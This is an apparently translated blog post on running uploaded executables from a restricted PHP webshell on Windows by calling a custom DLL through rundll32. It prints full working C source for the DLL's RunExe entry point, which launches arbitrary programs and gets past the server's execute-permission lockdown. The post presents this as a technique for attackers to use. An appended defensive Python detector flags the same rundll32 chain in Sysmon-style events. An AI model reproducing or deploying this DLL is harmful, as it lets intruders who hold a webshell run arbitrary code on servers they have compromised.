Execute exe using rundll32 in webshell

Source: Internet
Author: User

Abstract: On this web shell the system permissions were tightly set: the ordinary exe files could not be executed, and an exe uploaded to a writable directory had no execute permission either. Rundll32.exe, however, had been missed when the permissions were set, so this code was written for that case.

At the beginning of the test, PHP did not seem to have the right to execute commands. I was planning to use one of PHP's own overflow problems to obtain a low-privilege shell. Later it was unexpectedly discovered that the proc_open function could execute some built-in commands, but external commands and directories both had strict permission settings. In this situation only the external commands that could still be used were tested. The rundll32.exe program was tried at the end of the test, and it alone did not come back with "insufficient permission". So: write a DLL and call it through rundll32 to execute any self-uploaded exe file. Maybe this is a small problem with Windows permissions? After all, the exe indirectly executed through rundll32 still runs with the guest permissions of the PHP shell, although the caller has changed; the real reason remains to be studied further.

/******************************************************************************
 * When a server's permissions are set very restrictively, the system's exe files
 * cannot be executed, and a self-uploaded exe in a writable directory cannot be
 * executed either.
 * The root cause is that they missed setting the permission for the rundll32.exe file ......
 * Code by wustyunshu ### hotmail.com,: 20
 ******************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

// DLL entry point
BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    return TRUE;
}

// Entry called by rundll32 (rundll32.exe <dll>,RunExe <exe> [args]); it must be
// exported (e.g. through a .def file) so that rundll32 can find it by name
void RunExe(HWND hwnd, HINSTANCE hinst, LPSTR szCmdLine, int nCmdShow)
{
    if (szCmdLine == NULL)
    {
        return;
    }

    // Convert the ANSI command line to wide characters for CommandLineToArgvW
    DWORD dwNum = MultiByteToWideChar(CP_ACP, 0, szCmdLine, -1, NULL, 0);
    wchar_t *wszCmdLine = new wchar_t[dwNum];
    if (!wszCmdLine)
    {
        return;
    }
    MultiByteToWideChar(CP_ACP, 0, szCmdLine, -1, wszCmdLine, dwNum);

    int argc;
    LPWSTR *argv = CommandLineToArgvW(wszCmdLine, &argc);
    if (!argv || argc < 1)
    {
        delete[] wszCmdLine;
        return;
    }

    wchar_t Cmd[256] = {0};
    wchar_t Args[1024] = {0};

    // strncpy(Cmd, argv[0], sizeof(Cmd) - 1);
    // The first token is the exe to run; the copy is bounded in characters, not bytes
    wcsncpy(Cmd, argv[0], sizeof(Cmd) / sizeof(Cmd[0]) - 1);
    if (argc > 1)
    {
        // The remaining tokens are joined, space-separated, into the child's command line
        for (int index = 1; index < argc; index++)
        {
            if (wcslen(Args) + wcslen(argv[index]) + 2 > sizeof(Args) / sizeof(Args[0]))
            {
                break;
            }
            wcscat(Args, L" ");
            wcscat(Args, argv[index]);
        }
    }

    STARTUPINFOW si;
    memset((void *)&si, 0, sizeof(STARTUPINFOW));
    GetStartupInfoW(&si);

    // New process input/output redirection
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW;
    // si.wShowWindow = SW_HIDE;

    PROCESS_INFORMATION processInfo;
    memset((void *)&processInfo, 0, sizeof(PROCESS_INFORMATION));

    // Create the process
    if (CreateProcessW(Cmd, Args, NULL, NULL, TRUE, 0, NULL, NULL, &si, &processInfo))
    {
        // Let the child run for at most 60 seconds, then terminate it
        Sleep(60 * 1000);
        TerminateProcess(processInfo.hProcess, 0);
        CloseHandle(processInfo.hThread);
        CloseHandle(processInfo.hProcess);
    }

    LocalFree(argv);
    delete[] wszCmdLine;
}
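As an added example (not part of the original post or its code), a small detector over constructed Sysmon-style process-creation events that flags the chain described above: a web server worker spawning rundll32, rundll32 loading a DLL from outside the Windows directory, and rundll32 launching a non-system executable. The field names follow Sysmon Event ID 1; the worker-process list and all sample paths are assumptions.

```python
import re

# Constructed Sysmon-style process-creation events (Event ID 1 fields); not real logs.
# The first two model the chain described above: PHP -> rundll32 -> uploaded exe.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\php\php-cgi.exe", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\inetpub\wwwroot\upload\run.dll,RunExe C:\inetpub\wwwroot\upload\tool.exe -v"},
    {"ParentImage": r"C:\Windows\System32\rundll32.exe", "Image": r"C:\inetpub\wwwroot\upload\tool.exe",
     "CommandLine": r" -v"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

# Web server worker processes that have no business spawning rundll32 (assumed list; tune per host).
WEB_WORKERS = {"w3wp.exe", "php-cgi.exe", "php.exe", "httpd.exe", "nginx.exe"}
SYSTEM_DIR = "c:\\windows\\"

def _name(path):
    return path.rsplit("\\", 1)[-1].lower()

def _in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIR)

def rundll32_dll_arg(cmdline):
    """Return the DLL argument of 'rundll32[.exe] <dll>[,<entry>] [args]', or None."""
    m = re.match(r'\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+"?([^",\s]+)', cmdline, re.IGNORECASE)
    return m.group(1) if m else None

def classify(event):
    """Return the reasons this event looks like rundll32 abuse (empty list = nothing suspicious)."""
    reasons = []
    image, parent = _name(event["Image"]), _name(event["ParentImage"])
    if image == "rundll32.exe":
        if parent in WEB_WORKERS:
            reasons.append(f"rundll32 spawned by web worker {parent}")
        dll = rundll32_dll_arg(event["CommandLine"])
        # An absolute DLL path outside the Windows directory (e.g. an upload folder) is the key
        # signal; bare names such as shell32.dll resolve through the normal search path.
        if dll and "\\" in dll and not _in_system_dir(dll):
            reasons.append(f"rundll32 loading DLL from outside the Windows directory: {dll}")
    elif parent == "rundll32.exe" and not _in_system_dir(event["Image"]):
        reasons.append(f"rundll32 launched a non-system executable: {event['Image']}")
    return reasons

def scan(events):
    """Return (index, reasons) for every event that trips at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```

Feeding real Sysmon events in requires only mapping the three fields; the same rules can be expressed in a SIEM query where parent/child/command-line fields are available.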
